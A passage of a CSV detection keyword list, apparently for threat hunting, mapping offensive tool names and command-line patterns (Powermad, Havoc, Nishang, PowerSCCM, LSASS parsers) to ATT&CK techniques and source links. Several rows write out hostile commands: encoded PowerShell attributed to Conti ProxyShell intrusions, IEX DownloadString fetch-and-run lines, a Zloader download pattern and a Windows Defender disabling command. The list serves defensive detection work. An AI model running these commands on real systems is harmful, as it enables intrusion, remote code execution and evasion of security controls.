Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*Powermad-master*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*PowerMemory*","offensive_tool_keyword","PowerMemory","Exploit the credentials present in files and memory","T1003 - T1555 - T1213 - T1558","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/giMini/PowerMemory","1","0","N/A","N/A","9","819","219","2023-05-25T17:58:53Z","2015-08-29T17:09:23Z" +"*PowerOPS*","offensive_tool_keyword","PowerOPS","PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a powershell runspace environment (.NET). It intends to include multiple offensive PowerShell modules to make the process of Post Exploitation easier.","T1059 - T1027 - T1053 - T1129 - T1086","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/fdiskyou/PowerOPS","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powerpick -Command *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*powerpick.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*PowerPick.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Powerpreter.psm1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*powerpwn.powerdump*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*powerpwn_tests*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*power-pwn-main*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*PowerSCCM.ps1*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" +"*PowerSCCM.psd1*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" +"*PowerSCCM.psm1*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" +"*PowerSCCM-master*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" +"*powerseb/PowerExtract*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" +"*powerseb/PowerExtract*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" +"*PowerSharpBinaries*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*PowerSharpPack.ps1*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*PowerSharpPack-master*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*PowerShdll*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","1","N/A","N/A","10","1650","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" +"*powershell *C:\Users\Public\*.exe* forfiles.exe /p *\system32 *.exe**","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*powershell *Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -property * | findstr*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell -c *\windows\system32\inetsrv\appcmd.exe list apppool /@t:*","greyware_tool_keyword","powershell","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","Checking For Hidden Credentials With Appcmd.exe","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*powershell -enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AbAB0AGUAcwB0ACAALwBkAGMAbABpAHMAdAA6ACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #5","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell -enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AZQB0ACAAZwByAG8AdQBwACAAIgBkAG8AbQBhAGkAbgAgAGMAbwBtAHAAdQB0AGUAcgBzACIAIAAvAGQAbwBtAGEAaQBuACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #5","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell -enc cwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #2","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell -enc cwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAB0AGUAcwBlAHQA*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #6","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell -enc dwBoAG8AYQBtAGkA*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #1","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell -enc JABhAD0AIgBQAEMAVgBBAEkARgBCAGgAWgAyAFUAZwBUAEcARgB1AFoAMwBWAGgAWgAyAFUAOQBJAGsATQBqAEkAaQBCAEUAWgBXAEoAMQBaAHoAMABpAGQASABKADEAWgBTAEkAZwBkAG0ARgBzAGEAVwBSAGgAZABHAFYAUwBaAFgARgAxAFoAWABOADAAUABTAEoAbQBZAFcAeAB6AFoAUwBJAGcASgBUADQATgBDAGoAdwBsAFEAQwBCAEoAYgBYAEIAdgBjAG4AUQBnAFQAbQBGAHQAWgBYAE4AdwBZAFcATgBsAFAAUwBKAFQAZQBYAE4AMABaAFcAMAB1AFIARwBsAGgAWgAyADUAdgBjADMAUgBwAFkAMwBNAGkASQBDAFUAKwBEAFEAbwA4AEoAVQBBAGcAUwBXADEAdwBiADMASgAwAEkARQA1AGgAYgBXAFYAegBjAEcARgBqAFoAVAAwAGkAVQAzAGwAegBkAEcAVgB0AEwAawBsAFAASQBpAEEAbABQAGcAMABLAFAAQwBWAEEASQBFAGwAdABjAEcAOQB5AGQAQwBCAE8AWQBXADEAbABjADMAQgBoAFkAMgBVADkASQBsAE4ANQBjADMAUgBsAGIAUwBJAGcASgBUADQATgBDAGoAdwBsAFEAQwBCAEoAYgBYAEIAdgBjAG4AUQBnAFQAbQBGAHQAWgBYAE4AdwBZAFcATgBsAFAAUwBKAFQAZQBYAE4AMABaAFcAMAB1AFUAbgBWAHUAZABHAGwAdABaAFMANQBUAFoAWABKAHAAWQBXAHgAcABlAG0ARgAwAGEAVwA5AHUATABrAFoAdgBjAG0AMQBoAGQASABSAGwAYwBuAE0AdQBRAG0AbAB1AFkAWABKADUASQBpAEEAbABQAGcAMABLAFAASABOAGoAYwBtAGwAdwBkAEMAQgB5AGQAVwA1AGgAZABEADAAaQBjADIAVgB5AGQAbQBWAHkASQBqADQATgBDAG4AQgB5AGIAMwBSAGwAWQAzAFIAbABaAEMAQgB6AGQASABKAHAAYgBtAGMAZwBSAFgAaABqAGEARwBGAHUAWgAyAFYAUwBkAFcANQAwAGEAVwAxAGwASwBDAGsATgBDAG4AcwBOAEMAZwBsAHkAWgBYAFIAMQBjAG0ANABnAGMAeQA1AFUAWgBYAGgAMABMAGwAUgB2AFUAMwBSAHkAYQBXADUAbgBLAEMAawA3AEQAUQBwADkARABRAHAAdwBjAG0AOQAwAFoAVwBOADAAWgBXAFEAZwBkAG0AOQBwAFoAQwBCAEUAWQBYAFIAaABZAG0ARgB6AFoAUwBoAE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAZwBiAFMAeABDAGEAVwA1AGgAYwBuAGwARwBiADMASgB0AFkAWABSADAAWgBYAEkAZwBZAGkAawBOAEMAbgBzAE4AQwBnAGsASgBiAFMANQBRAGIAMwBOAHAAZABHAGwAdgBiAGkAQQA5AEkARABBADcARABRAG8ASgBDAFcASQB1AFIARwBWAHoAWgBYAEoAcABZAFcAeABwAGUAbQBVAG8AYgBTAGsANwBEAFEAcAA5AEQAUQBwAHcAYwBtADkAMABaAFcATgAwAFoAVwBRAGcAZABtADkAcABaAEMAQgBEAFgAMABOAHMAYQBXAE4AcgBLAEcAOQBpAGEAbQBWAGoAZABDAEIAegBaAFcANQBrAFoAWABJAHMASQBFAFYAMgBaAFcANQAwAFEAWABKAG4AYwB5AEIAbABLAFEAMABLAGUAdwAwAEsAQwBRAGwAQwBlAFgAUgBsAFcAMQAwAGcAVQB5AEEAOQBJAEYATgA1AGMAMwBSAGwAYgBTADUARABiADIANQAyAFoAWABKADAATABrAFoAeQBiADIAMQBDAFkAWABOAGwATgBqAFIAVABkAEgASgBwAGIAbQBjAG8AUgBYAGgAagBhAEcARgB1AFoAMgBWAFMAZABXADUAMABhAFcAMQBsAEsAQwBrAHAATwB3ADAASwBDAFEAbABOAFoAVwAxAHYAYwBuAGwAVABkAEgASgBsAFkAVwAwAGcAYgBTAEEAOQBJAEcANQBsAGQAeQBCAE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAbwBVAHkAawA3AEQAUQBvAEoAQwBVAEoAcABiAG0ARgB5AGUAVQBaAHYAYwBtADEAaABkAEgAUgBsAGMAaQBCAGkASQBEADAAZwBiAG0AVgAzAEkARQBKAHAAYgBtAEYAeQBlAFUAWgB2AGMAbQAxAGgAZABIAFIAbABjAGkAZwBwAE8AdwAwAEsAQwBRAGwARQBZAFgAUgBoAFkAbQBGAHoAWgBTAGgAdABMAEcASQBwAE8AdwAwAEsARABRAHAAOQBEAFEAbwA4AEwAMwBOAGoAYwBtAGwAdwBkAEQANABOAEMAagB4AG8AZABHADEAcwBQAGcAMABLAFAARwBaAHYAYwBtADAAZwBhAFcAUQA5AEkAbQBaAHYAYwBtADAAaQBJAEgASgAxAGIAbQBGADAAUABTAEoAegBaAFgASgAyAFoAWABJAGkASQBEADQATgBDAGoAeABoAGMAMwBBADYAVgBHAFYANABkAEUASgB2AGUAQwBCAHkAZABXADUAaABkAEQAMABpAGMAMgBWAHkAZABtAFYAeQBJAGkAQgBKAFIARAAwAGkAYwB5AEkAZwBWAG0ARgBzAGQAVwBVADkASQBpAEkAZwBhAFcANQB3AGQAWABRAGcAYwAzAFIANQBiAEcAVQA5AEkAbQBKAHYAYwBtAFIAbABjAGoAbwB3AGMASABnAGkATAB6ADQATgBDAGoAeABoAGMAMwBBADYAUQBuAFYAMABkAEcAOQB1AEkARQBsAEUAUABTAEoARABJAGkAQgB5AGQAVwA1AGgAZABEADAAaQBjADIAVgB5AGQAbQBWAHkASQBpAEIAVQBaAFgAaAAwAFAAUwBJAGkASQBFADkAdQBRADIAeABwAFkAMgBzADkASQBrAE4AZgBRADIAeABwAFkAMgBzAGkASQBDADgAKwBEAFEAbwA4AEwAMgBaAHYAYwBtADAAKwBEAFEAbwA4AEwAMgBKAHYAWgBIAGsAKwBEAFEAbwA4AEwAMgBoADAAYgBXAHcAKwAiADsAJABhAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABhACkAKQA7AHMAYwAgAC0AcABhAHQAaAAgACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAYQAuAHQAeAB0ACIAIAAtAHYAYQBsAHUAZQAgACQAYQAgAC0ARgBvAHIAYwBlADsAcwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #3","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell -enc QwBvAHAAeQAtAEkAdABlAG0AIAAtAHAAYQB0AGgAIABjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAYwB1AHIAcgBlAG4AdABcAHQAaABlAG0AZQBzAFwAUgBlAHMAbwB1AHIAYwBlAEgAYQBuAGQAbABlAHIALgBhAHMAcAB4ACIAIAAtAEYAbwByAGMAZQA7AHMAYwAgAC0AcABhAHQAaAAgAGMAOgBcAGkAbgBlAHQAcAB1AGIAXAB3AHcAdwByAG8AbwB0AFwAYQBzAHAAbgBlAHQAXwBjAGwAaQBlAG4AdABcAHQAZQBzAHQALgB0AHgAdAAgAC0AdgBhAGwAdQBlACAAKABpAGUAeAAoACcAbABzACAAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABjAHUAcgByAGUAbgB0AFwAdABoAGUAbQBlAHMAXAAiACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #4","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell IEX (New-Object Net.WebClient).DownloadString(*) Get-NetComputer -FullData *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell IEX (New-Object Net.WebClient).DownloadString*.ps1*Get-NetComputer -FullData*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell Invoke-WebRequest http*.bat *","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Powershell LDAPWordlistHarvester*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","0","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" +"*powershell New-ItemProperty -Path *HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender* -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force*","greyware_tool_keyword","powershell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell -nop -exec bypass -EncodedCommand 